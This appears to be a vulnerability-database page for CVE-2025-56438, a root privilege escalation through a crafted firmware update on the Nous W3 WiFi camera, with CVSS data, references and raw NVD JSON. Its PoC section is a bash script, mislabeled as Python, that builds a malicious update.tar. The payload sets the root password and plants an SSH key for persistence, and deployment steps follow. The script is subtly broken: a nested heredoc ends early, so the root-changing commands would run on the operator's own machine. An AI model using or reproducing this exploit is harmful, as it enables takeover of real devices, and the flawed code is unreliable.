CVE-2025-56438

Description

An issue in the firmware update mechanism of Nous W3 Smart WiFi Camera v1.33.50.82 allows unauthenticated and physically proximate attackers to escalate privileges to root via supplying a crafted update.tar archive file stored on a FAT32-formatted SD card.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Nous W3 Smart WiFi Camera v1.33.50.82

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-56438 PoC - Nous W3 Smart WiFi Camera Firmware Update Exploitation
# This script creates a malicious update.tar for privilege escalation

# Create directory structure
mkdir -p exploit_update/system/sdcard
cd exploit_update

# Create malicious script that will be executed with root privileges
cat > system/sdcard/run.sh << 'EOF'
#!/bin/sh
# Reverse shell or privilege escalation payload
# This script will be executed as root

# Create new root user or modify existing
chpasswd << EOF
root:password123
EOF

# Add SSH public key for persistent access
mkdir -p /root/.ssh
chmod 700 /root/.ssh
echo 'ssh-rsa AAAA...' > /root/.ssh/authorized_keys

# Log successful exploitation
echo "[$(date)] CVE-2025-56438 exploit successful" >> /tmp/exploit_log.txt
EOF

chmod +x system/sdcard/run.sh

# Create the malicious update.tar archive
tar -cvf update.tar system/

# Cleanup
cd ..
rm -rf exploit_update

echo "Malicious update.tar created successfully"
echo "Instructions:"
echo "1. Format SD card as FAT32"
echo "2. Copy update.tar to SD card root directory"
echo "3. Insert SD card into Nous W3 Smart WiFi Camera"
echo "4. Reboot the device to trigger exploitation"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56438
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56438
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56438/
[4] VulDB https://vuldb.com/cve/CVE-2025-56438
[5] http://nous.com
[6] https://github.com/MMarble21/Smart-camera-privilege-escalation/blob/main/ADVISORY.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56438", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:39.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the firmware update mechanism of Nous W3 Smart WiFi Camera v1.33.50.82 allows unauthenticated and physically proximate attackers to escalate privileges to root via supplying a crafted update.tar archive file stored on a FAT32-formatted SD card."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}], "references": [{"url": "http://nous.com", "source": "[email protected]"}, {"url": "https://github.com/MMarble21/Smart-camera-privilege-escalation/blob/main/ADVISORY.md", "source": "[email protected]"}]}}